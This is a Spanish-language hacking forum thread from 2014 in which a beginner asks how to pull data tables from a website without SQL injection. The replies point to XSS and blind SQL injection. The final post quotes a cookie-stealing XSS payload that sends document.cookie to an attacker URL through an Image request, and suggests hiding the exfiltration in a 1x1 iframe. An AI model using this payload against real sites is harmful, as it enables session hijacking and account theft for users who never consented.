comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SOLUCIONADO] Como obtener tablas de datos de una pagina web?

  • 12 Respuestas
  • 2147 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado diego1399

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Marzo 09, 2014, 04:00:21 pm »
Hola soy muy nuevo en el tema de seguridad informatica,y queria saber que metodo puedo usar que no sea sql injection,ya que ese metodo para esa pagina no sirve,hay algun otro metodo?Me podrian decir cual es asi solo busco y leo!
« Última modificación: Mayo 25, 2014, 04:10:27 pm por blackdrake »

Conectado rollth

  • *
  • Underc0der
  • Mensajes: 875
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #1 en: Marzo 09, 2014, 04:12:12 pm »
la verdad es que todas las paginas estan programadas con html, css y javascript xD, la cosa es que hay muchas formas y cada pagina tiene sus errores.
Yo tampoco soy muy experto pero podrias buscar sobre inyecciones xss, blind sql(me suena que se llamaba asi) o (yo no lo se usar) con kali o backtrack.
Para hacer una inyeccion sql tambien tiene que tener una base de datos.
Si me equivoco en algo que me corrijan los que saben xD.

Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Desconectado diego1399

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Marzo 09, 2014, 04:18:41 pm »
Gracias no tenia idea de donde empezar,buscare eso,no se,pense que tal vez algunas pagina programadas en "x" lenguajes podrian ser mas vulnerables,disculpa.
« Última modificación: Marzo 09, 2014, 08:14:59 pm por Snifer »

Conectado rollth

  • *
  • Underc0der
  • Mensajes: 875
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #3 en: Marzo 09, 2014, 04:46:19 pm »
Estamos para ayudar, te paso este link que parece esta interesante You are not allowed to view links. Register or Login
Siento no poder ayudarte mas pero mis conocimientos son muy limitados

Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Desconectado .:UND3R:.

  • *
  • Underc0der
  • Mensajes: 226
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Marzo 09, 2014, 07:11:29 pm »
html, css y Javascript, son lenguajes de programación a nivel web ejecutado en el cliente, es decir no pueden ser vulnerados o explotados. PHP, ASP, etc. son ejecutados en el servidor, por lo cual podrían ser vulnerados, una página simple sin base de datos ni programación a nivel de servidor no creo que puedan ser comprometidos, debido a su simple composición. Es decir olvídate den análisis de fallos de seguridad a nivel web, alternativamente puedes hacer un análisis a nivel de servidor, saludos y suerte.

Conectado rollth

  • *
  • Underc0der
  • Mensajes: 875
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #5 en: Marzo 09, 2014, 07:34:38 pm »
javascript se puede utilizar para sacar los cookies de sesion :)

Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #6 en: Marzo 09, 2014, 08:16:06 pm »
Pero necesitas tener un vector de ataque muy bien armado y demas trajes asi que de que funcione a un simple document.cookie :P olvidalo, a no ser que sea la peor de la peor la web.

Regards,
Snifer
You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado .:UND3R:.

  • *
  • Underc0der
  • Mensajes: 226
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Marzo 09, 2014, 09:17:01 pm »
You are not allowed to view links. Register or Login
javascript se puede utilizar para sacar los cookies de sesion :)

efectivamente, siempre cuando puedas inyectar un XSS el cual es generado por lenguajes ejecutados a nivel de servidor.

Conectado rollth

  • *
  • Underc0der
  • Mensajes: 875
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #8 en: Marzo 10, 2014, 08:19:14 am »
Ya que ha surgido el tema me preguntaba si en un fallo xss se podria introducir tambien codigo php para hacer que sacara los cookies y te los enviara al correo, para que asi sea mas facil

Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #9 en: Marzo 10, 2014, 05:50:46 pm »
You are not allowed to view links. Register or Login
Ya que ha surgido el tema me preguntaba si en un fallo xss se podria introducir tambien codigo php para hacer que sacara los cookies y te los enviara al correo, para que asi sea mas facil

Tu vector de ataque ya es mucho mas complejo!! xD pero adelante..


Regards,
Snfer
You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Conectado rollth

  • *
  • Underc0der
  • Mensajes: 875
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #10 en: Marzo 10, 2014, 06:53:45 pm »
jaja es que llevo poco tiempo xD, por cierto que es un vector de ataque? lo he visto en muchos post pero no se bien que es

Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #11 en: Marzo 11, 2014, 10:10:18 am »
You are not allowed to view links. Register or Login
jaja es que llevo poco tiempo xD, por cierto que es un vector de ataque? lo he visto en muchos post pero no se bien que es

Lo que te ayudara es Google ;)

Regards,
Snifer
You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado .:UND3R:.

  • *
  • Underc0der
  • Mensajes: 226
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #12 en: Marzo 12, 2014, 07:46:46 pm »
You are not allowed to view links. Register or Login
Ya que ha surgido el tema me preguntaba si en un fallo xss se podria introducir tambien codigo php para hacer que sacara los cookies y te los enviara al correo, para que asi sea mas facil

Yo creo que lo que comentas es imposible, ya que estás mezclando niveles de programación, recuerda que XSS se ejecuta a nivel de clientes (navegador), por ello la compatibilidad de XSS, el cual XSS sofisticados y capaces de hacer bypass ha filtros son compatibles en algunos navegadores, el PHP es otro tema, lo que puedes hacer es inyectar código javascript (ejecutado por el navegador), una vez ejecutado que en este caso sería obtener la cookie de la web, se procedería a llamar a a una página (redireccionar) que apunte a un simple PHP capaz de almacenar una variable que reciba:


aquí un ejemplo extraido de internet:
<script>
new Image().src="You are not allowed to view links. Register or Logincookie="+encodeURI(document.cookie);
</script>

La cookie sería enviada como parámetro.

Otra idea que saqué de un libro el cual encontré muy interesante que sería la solución al redireccionamiento, ya que se debe cargar la página del hacker con el parámetro, si hay una redirección sería muy sospechoso a mi gusto no es un ataque elegante, por lo cual en el libro se comentaba crear un iframe de 1x1, integrarlo al documento html y posteriormente enviar los parámetros a la url "maligna", ideas hay muchas pero hay que tener creatividad, saludos.

 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 5284
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
[SOLUCIONADO] Multiuploader de imagenes con mysql, hosting de imagenes con mysql

Iniciado por graphixx

Respuestas: 4
Vistas: 2015
Último mensaje Marzo 26, 2013, 05:42:58 pm
por Xt3mP
[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 2476
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Ayuda urgente con Virus "Virus.Win32Sality"

Iniciado por Napsters

Respuestas: 6
Vistas: 3261
Último mensaje Junio 11, 2012, 03:38:18 am
por Satyricon
[SOLUCIONADO] Problem al instalar Windows "cualquier windows"

Iniciado por Made

Respuestas: 7
Vistas: 2819
Último mensaje Septiembre 03, 2012, 04:53:08 pm
por Made